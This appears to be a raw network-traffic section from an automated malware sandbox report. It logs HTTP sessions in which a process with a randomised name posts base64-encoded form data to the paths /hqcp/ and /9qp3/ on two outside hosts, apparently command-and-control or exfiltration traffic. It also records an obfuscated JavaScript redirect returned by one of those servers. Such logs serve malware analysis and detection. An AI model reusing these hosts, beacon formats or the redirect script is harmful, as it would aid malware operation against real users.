                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.11.2049775142.202.6.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:19.814647913 CEST1128OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 47 31 79 51 43 67 71 70 53 56 68 46 2b 62 2b 67 2f 73 63 79 6b 48 77 66 57 44 61 74 43 4c 36 2f 48 6c 71 75 58 72 47 45 62 6a 4d 52 37 48 78 61 56 42 4f 32 4e 52 6d 45 6f 6e 52 30 56 38 34 62 56 6e 35 33 69 5a 67 51 50 6e 4c 47 57 69 64 59 72 6c 66 63 66 31 2b 49 53 59 51 67 68 66 79 39 53 4c 31 58 59 39 53 74 44 7a 32 6c 41 67 70 35 6a 57 34 36 32 68 49 69 59 70 65 6f 32 2b 54 4b 4a 4a 52 71 6e 4e 71 77 61 57 65 4b 6b 53 6f 58 55 61 51 65 54 34 43 77 30 43 65 6b 50 51 52 31 54 47 69 43 53 70 31 6a 46 32 41 56 6c 4b 44 2f 34 54 4f 64 4b 73 70 4c 54 67 74 4a 5a 55 73 7a 67 63 37 35 61 55 56 61 36 6f 4f 4d 6a 76 54 6c 43 52 4a 4f 36 6d 59 59 43 5a 37 50 75 47 6f 66 51 61 42 55 64 58 6a 35 78 56 70 4c 70 49 4e 56 4c 5a 6f 6e 62 58 65 4a 4a 63 55 5a 67 39 62 46 45 47 30 6c 55 68 6d 35 71 6f 59 6b 47 6f 34 75 44 45 54 67 6f 38 32 6e 71 64 4c 72 6a 48 69 4f 47 77 54 65 5a [TRUNCATED]
                                                            Data Ascii: vX=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8G1yQCgqpSVhF+b+g/scykHwfWDatCL6/HlquXrGEbjMR7HxaVBO2NRmEonR0V84bVn53iZgQPnLGWidYrlfcf1+ISYQghfy9SL1XY9StDz2lAgp5jW462hIiYpeo2+TKJJRqnNqwaWeKkSoXUaQeT4Cw0CekPQR1TGiCSp1jF2AVlKD/4TOdKspLTgtJZUszgc75aUVa6oOMjvTlCRJO6mYYCZ7PuGofQaBUdXj5xVpLpINVLZonbXeJJcUZg9bFEG0lUhm5qoYkGo4uDETgo82nqdLrjHiOGwTeZbqdAHT6UK0NhJqiQRy/xqbLZfbb4Kw+rSFCu1jHJvJv5GEQgm0HVdQiHnmQ+LIgopDfvBvjG9rbCWcAgynPR09MduvdjS8Txb0/VIkJnZW5l5iauu0CgPd0VSMF36X2ep1FVt8QNnkdnnSK0JFdb7OVByx+nZjjMFCjrj7sfjxflgAqLvl4J8ud5x5JLNnXHbwmM3Vvo=
                                                            Jul 3, 2024 17:35:20.974178076 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.11.2049776142.202.6.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:22.534113884 CEST6445OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 55 6e 37 58 74 71 50 30 6d 73 72 31 74 63 76 63 74 42 30 37 79 43 54 34 47 66 74 61 44 38 4f 31 79 6a 4b 67 34 61 36 56 69 46 2b 62 77 41 2f 74 63 79 6c 46 77 66 4f 63 61 74 47 62 36 39 2f 6c 71 2f 48 72 47 57 6a 6a 4a 52 37 43 74 4b 56 50 66 6d 4e 46 6d 45 6b 4e 52 30 42 4b 34 72 4a 6e 2b 77 6d 5a 6c 6a 6e 6d 52 32 57 6b 64 59 72 68 4f 4d 66 58 2b 49 6d 49 51 67 6c 66 79 2b 32 4c 33 6c 51 39 42 75 62 7a 2f 56 41 76 6e 5a 6a 4e 69 4b 32 41 49 69 38 39 65 6f 32 75 54 4c 4e 4a 52 74 7a 4e 72 33 47 56 65 71 6b 53 6d 33 55 5a 42 4f 65 2f 43 77 34 61 65 6e 54 51 52 31 4c 47 6a 69 53 70 6c 58 5a 31 48 31 6c 4d 48 2f 34 36 59 74 33 41 70 4c 58 53 74 49 39 55 74 44 63 63 30 6f 61 55 47 4c 36 6f 41 4d 6a 74 4f 56 44 4c 43 75 36 41 59 5a 7a 6c 37 4d 6e 78 6f 59 49 61 41 32 56 58 6d 59 78 61 67 4c 70 4f 49 56 4c 4d 73 6e 48 54 65 4a 59 44 55 5a 67 58 62 42 55 47 7a 55 6b 68 33 4e 47 72 62 30 48 42 73 65 44 4b 61 41 73 71 32 6e 65 46 4c 6f 7a 70 69 50 53 77 51 2b 5a [TRUNCATED]
                                                            Data Ascii: vX=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8O1yjKg4a6ViF+bwA/tcylFwfOcatGb69/lq/HrGWjjJR7CtKVPfmNFmEkNR0BK4rJn+wmZljnmR2WkdYrhOMfX+ImIQglfy+2L3lQ9Bubz/VAvnZjNiK2AIi89eo2uTLNJRtzNr3GVeqkSm3UZBOe/Cw4aenTQR1LGjiSplXZ1H1lMH/46Yt3ApLXStI9UtDcc0oaUGL6oAMjtOVDLCu6AYZzl7MnxoYIaA2VXmYxagLpOIVLMsnHTeJYDUZgXbBUGzUkh3NGrb0HBseDKaAsq2neFLozpiPSwQ+Zbu+oAZKUNo9hb3SRHy/8FbPIkavwKi+bSTyu2yXJrCP5AAQgm0HRjQiLnmlaLG3EpGI7BjDG/rbCLcAtCnPZr9MMDvY7S8GVbkq4e0JncUJk79Kz40DMHdwwpP3j6W2Opj1Vi3gNgjdm+DaoFFdGOOV1ix+PZvV1JaAm6v+T11e9lGJTki6xjtLt8ytjJvFb20mwJAZLCj+D29IuqglmIHNpLMiEebe4Dqp+O/IiXVUlBX+jaEUXTDCwQCxoO5RdqgYedSNjx288kTRHF1zoRfxaglzcZTCf1OlJ0YGQbXgTI6FB/FnOkRf6w1cZ7hGJ3ht1jWnRzhBWLtx+NPRy+owDpGkyR7XCoVlNmXDez81U/JmNPYQCQNkcKV0UoZdOvV/Q5KRxtPbWFtamEDvkM4NH1fTwYgjfzBsNnOVSqqevioRiPfZr0RO8aagkSowbhenGyMla+Jz+yME7MEYK/2LbxsuPHpybQWTGI2jm/DL8Gtl+bT1tbaS9BDZ9+RbbOe8AN6K/7pplL6vM1/rQz0a2VbYl07bz6OXsVhyf+abAoGhry7jiBDXG2aAz6HMGzow+6jY4/CNVhTnxsp91yfZDlYIqigH30SauR3QkTdfocegPgqcDMlsw5/Dc6Iwp6pbQ7pJYR8x9YQWoUOcElnYTvUpHvgCae9 [TRUNCATED]
                                                            Jul 3, 2024 17:35:22.534220934 CEST6445OUTData Raw: 44 45 6a 72 55 4e 71 63 64 72 6a 78 74 71 6f 61 78 71 46 52 33 68 6b 38 41 38 2b 37 57 45 2b 75 71 46 7a 68 6d 4c 76 48 39 41 49 58 47 4a 47 56 49 79 41 6f 38 47 59 44 37 4a 69 4f 7a 37 33 70 6f 36 58 58 46 4c 32 58 2f 49 4c 64 2b 39 41 49 70 32
                                                            Data Ascii: DEjrUNqcdrjxtqoaxqFR3hk8A8+7WE+uqFzhmLvH9AIXGJGVIyAo8GYD7JiOz73po6XXFL2X/ILd+9AIp2eq9WIxB/u7YXKeeVlUeaFnTt+CKJETriQR/XjsyM+HQTxpAMXOtl3g5xQQQ4a51BnUgUmdIC0W729Q5+RhCMSrVtwkthsrRuNOBi8MMj8D7IMeqH3omytm9D3IY7MvXRUQcAmHqXasLVsXlHEEusZxxsXC/AP+N+8
                                                            Jul 3, 2024 17:35:22.703665972 CEST2578OUTData Raw: 4b 4d 6b 70 58 2b 4a 57 72 30 68 52 4b 53 6e 72 72 6a 4a 48 72 30 68 72 6f 4e 4e 78 36 7a 78 4f 6f 74 2f 65 50 49 46 30 44 56 78 6a 6f 54 31 71 4b 58 61 56 32 36 44 47 7a 59 78 43 34 55 61 54 4d 35 32 77 64 2f 58 55 50 73 71 38 59 34 38 31 64 4f
                                                            Data Ascii: KMkpX+JWr0hRKSnrrjJHr0hroNNx6zxOot/ePIF0DVxjoT1qKXaV26DGzYxC4UaTM52wd/XUPsq8Y481dOPbbfIG/OCrhj14ZbAcXtPTqMIDu16x+5pyZedwzrZml+7JzNgJSbtwbK5quIfJ1NMA9NT1VxvQP6l5v0M/C/0uZBJyPpBQ4y08WCWqGNsCgsZ/mAVBjVspMAwMZYlQ8MGc76cJ6PwwF/Iyn5vKLpWgBpiN9IZ9xry
                                                            Jul 3, 2024 17:35:22.703921080 CEST16757OUTData Raw: 69 6b 34 36 5a 31 79 56 6d 79 75 2f 4d 78 64 44 6d 2f 62 4a 73 53 37 42 50 62 46 79 54 4b 37 46 57 73 4a 42 2b 4e 4b 50 2f 35 56 69 32 49 6a 44 65 59 6b 33 32 77 52 2b 51 67 52 54 76 37 71 77 7a 6c 76 45 30 69 6a 61 44 6e 68 50 71 4b 44 52 68 31
                                                            Data Ascii: ik46Z1yVmyu/MxdDm/bJsS7BPbFyTK7FWsJB+NKP/5Vi2IjDeYk32wR+QgRTv7qwzlvE0ijaDnhPqKDRh1lCD1NnQ0xVBU83JTCINK+Qx+/g4jIvA4jLI1OCwF6S6C25DNvvejJ4JpGwL05N/BqVgtUkufiDpCHugURijPn53WVzsVUfndRjLcMS5Q1PnPU0MzCvTZWmXY5DK0sr82mMCNslcoiOGGsZJS8VnclBiBV1B1sP23k
                                                            Jul 3, 2024 17:35:22.704051018 CEST1289OUTData Raw: 35 35 45 41 75 4b 66 67 79 61 35 53 6d 67 6d 43 62 5a 45 64 6e 68 62 56 56 75 66 35 6e 45 67 70 4a 38 52 66 4b 36 63 36 46 69 76 64 75 4e 68 69 6f 51 65 4f 55 72 55 71 32 66 6d 58 77 7a 36 62 77 56 4f 48 50 53 4b 4e 47 48 33 57 52 70 36 67 45 4e
                                                            Data Ascii: 55EAuKfgya5SmgmCbZEdnhbVVuf5nEgpJ8RfK6c6FivduNhioQeOUrUq2fmXwz6bwVOHPSKNGH3WRp6gENX+oJfNEGOyxKYPntyGYGciyERcv1LlVR2wTFq9eDeQdZwFiBeEZVkgA1iqQpo2S2QWM2Q9Y3buvdxlMQwyu32yJmUmNXJ5hzP3cFPcQl57NdFmmWrO9qA9tUGEB36hvcT1/ETW2WULHp7rOqSEAbnZXjzpyOKJcuk
                                                            Jul 3, 2024 17:35:22.704210043 CEST3867OUTData Raw: 56 68 67 56 74 4d 6a 2b 61 61 2b 4c 72 72 78 42 35 6e 76 6a 41 55 65 37 38 74 45 53 46 74 41 68 5a 62 6f 65 33 6a 56 44 35 50 45 44 2f 42 66 64 59 66 35 53 4e 55 69 2b 61 31 32 75 4d 59 4a 41 41 68 4f 56 43 2f 79 61 69 58 47 6a 7a 4f 45 35 34 58
                                                            Data Ascii: VhgVtMj+aa+LrrxB5nvjAUe78tESFtAhZboe3jVD5PED/BfdYf5SNUi+a12uMYJAAhOVC/yaiXGjzOE54X3QgoROnlgDw+usiscWqtjzhbJfTa27JkC3jvBjy4t7x5WX/zKfS563TD+17dp3+BHy/P2qYUIq7nOvzzPAGwMuQ0Srwq5aL1SJpElHkBSlfGA7aNzmkymYhpZroTeIXr360KvQano+6HPkeO36Y0+Xl3JkRXpM8Si
                                                            Jul 3, 2024 17:35:22.704375982 CEST1289OUTData Raw: 45 64 34 5a 6f 52 46 46 37 67 5a 54 47 64 51 73 55 75 38 53 7a 78 62 70 65 44 38 37 46 55 36 5a 30 76 51 6b 46 6a 58 32 37 69 42 4a 65 5a 75 5a 38 2b 51 35 6e 46 4c 2f 61 66 42 6d 50 2b 70 6c 30 71 6b 6e 50 2f 70 2f 44 57 6a 68 59 32 35 33 6c 74
                                                            Data Ascii: Ed4ZoRFF7gZTGdQsUu8SzxbpeD87FU6Z0vQkFjX27iBJeZuZ8+Q5nFL/afBmP+pl0qknP/p/DWjhY253lt2zxYq3XO8lBYs/D/13mnHKeDy5Tl4OPRmwDJJ/xgd+4SMnPL89PTbaEEfMOBl7sT79asRNuFmBFRNXCHSojwnCzhlWXUAqm23zwNWUghJGswxh/OiAzJouJc0373VkczXvnvTdWLNsbcCLKd809zsB04TG51YTb0L
                                                            Jul 3, 2024 17:35:22.872997046 CEST2578OUTData Raw: 58 57 62 54 34 54 62 78 6c 57 31 74 79 73 75 49 59 65 72 49 49 6d 51 6a 6b 55 4d 4e 2b 6f 75 72 6f 46 51 66 38 7a 6e 45 75 79 4f 6e 34 4a 33 67 6d 44 76 35 53 79 4f 75 77 74 31 58 70 53 4e 39 41 70 30 32 48 34 54 31 7a 34 39 53 53 48 43 59 67 72
                                                            Data Ascii: XWbT4TbxlW1tysuIYerIImQjkUMN+ouroFQf8znEuyOn4J3gmDv5SyOuwt1XpSN9Ap02H4T1z49SSHCYgrZuFOdlskvTex5nQM9deusUic8ivZcQsR8Tcjxw2SgZCKJ9KAW77cNzLqWMxyvBCXXiULH/uGrNB3yFAvan63GlFn9/98Vt5BUx+mvohe+9pWcYy2LHYOAcbcEE7gbSTIuIg9H3O1uIswJEhXInKyCbd2kNZN+NrpK
                                                            Jul 3, 2024 17:35:22.873162031 CEST5156OUTData Raw: 45 6e 33 4d 62 38 6c 76 4d 71 7a 63 4e 75 4a 6c 59 31 48 63 4d 44 4d 65 65 59 7a 78 62 4d 30 57 78 68 71 61 4f 61 64 66 59 4b 32 34 34 35 2f 35 61 4b 50 4c 34 74 6d 44 75 35 46 4c 65 75 74 57 5a 6f 35 43 65 2b 2b 31 54 44 43 53 5a 4f 31 53 37 53
                                                            Data Ascii: En3Mb8lvMqzcNuJlY1HcMDMeeYzxbM0WxhqaOadfYK2445/5aKPL4tmDu5FLeutWZo5Ce++1TDCSZO1S7S3y7+2GcsQd34zXCx6lYORHV1f6AH3lRjGV6qHxDuNZCCSgepah+2IMqwX62DAMYWL1Sp+PTkp8E8d2WJ/3jw163JgfgIPf7WmMeEMkdGWiqiA4xicyqKSnk7F3nRfdeIq2jYVCjjH7omptjmatgRFZKLxuVN3be9a
                                                            Jul 3, 2024 17:35:22.873330116 CEST5156OUTData Raw: 52 4c 63 57 54 33 36 31 64 72 78 70 61 62 57 66 76 79 76 52 43 39 52 6c 79 6f 61 68 78 38 62 65 56 58 59 4c 6d 4a 46 67 75 35 41 34 47 30 6e 38 4a 79 34 45 38 35 53 45 46 51 72 52 50 79 70 51 4a 32 35 56 58 47 55 58 57 31 76 6c 6b 4a 51 39 32 33
                                                            Data Ascii: RLcWT361drxpabWfvyvRC9Rlyoahx8beVXYLmJFgu5A4G0n8Jy4E85SEFQrRPypQJ25VXGUXW1vlkJQ923biJYIHZQtIKjKPEJAncuyWh2Nuz4nZIBDzQ7An+sOVfXjZK8+H9/v4Dl3tOCq5qlC02WnrbeGoyJQvD3sqO+vmpoRXnd9JiY4dpG9HI63IoCK+Gbkld9ILW+gbJGkN89ugj1aCOta/6rRCcs0fJ7ZyjpY9VFyh7IL
                                                            Jul 3, 2024 17:35:22.873662949 CEST1958OUTData Raw: 2f 63 64 77 45 71 30 72 5a 42 2b 75 76 4c 50 48 6f 55 7a 47 63 62 55 34 37 6d 72 51 6a 4b 77 67 52 6f 38 46 52 34 43 42 69 2b 39 35 68 54 37 37 5a 43 4d 74 69 74 79 4d 77 4d 39 50 4e 2f 71 63 44 54 71 64 46 48 69 6a 41 5a 79 6c 70 58 75 64 2b 42
                                                            Data Ascii: /cdwEq0rZB+uvLPHoUzGcbU47mrQjKwgRo8FR4CBi+95hT77ZCMtityMwM9PN/qcDTqdFHijAZylpXud+B+zdSnUXjfGqnC0ZIJhxr/precUaFJy9AyrRB3PdSxYHzxmEG6M6aeJFjZXckqVAZFKNnA8qG5sU1RiKdEz9EWRsUOb9YInUbzoUzhLbCE9LFQb7ZAr0tN4J976IfWsXmFf/2iyG0jf1Now55NpN66XEOKem5TzJRm
                                                            Jul 3, 2024 17:35:24.045949936 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.11.2049777142.202.6.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:25.248404980 CEST522OUTGET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:35:26.419451952 CEST1283INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 34 32 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 2c 63 6b 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 30 30 63 63 66 32 37 34 63 33 61 35 39 33 61 33 36 35 33 65 36 61 63 62 66 62 30 30 63 37 63 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 [TRUNCATED]
                                                            Data Ascii: 442<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.jecxs.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; s [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.11.204977874.208.236.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:31.783313990 CEST803OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 5a 5a 4d 41 78 34 66 34 53 44 72 53 56 7a 44 56 63 2b 4f 30 4b 6a 44 75 46 58 6e 73 79 2f 41 54 6e 7a 61 6c 49 73 67 5a 56 45 6b 56 7a 4b 68 58 36 33 4a 79 65 7a 51 79 73 43 78 69 4e 30 79 35 6e 6d 46 47 63 4e 35 66 61 76 59 38 5a 56 2f 38 64 32 31 78 6a 65 47 59 2f 61 30 4a 4b 75 41 59 46 31 54 4a 49 66 7a 72 32 51 67 75 44 46 70 6d 33 43 6a 7a 77 4b 75 39 50 64 35 76 45 6a 6d 46 50 63 73 2f 38 57 68 39 46 5a 53 7a 33 39 73 49 37 4f 51 77 6a 56 52 31 35 68 73 78 75 34 4a 43 33 45 4b 76 77 6b 72 69 6d 49 4c 77 43 2b 6d 69 33 58 4a 68 6f 67 3d 3d
                                                            Data Ascii: vX=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwjVR15hsxu4JC3EKvwkrimILwC+mi3XJhog==
                                                            Jul 3, 2024 17:35:31.921339989 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:31 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
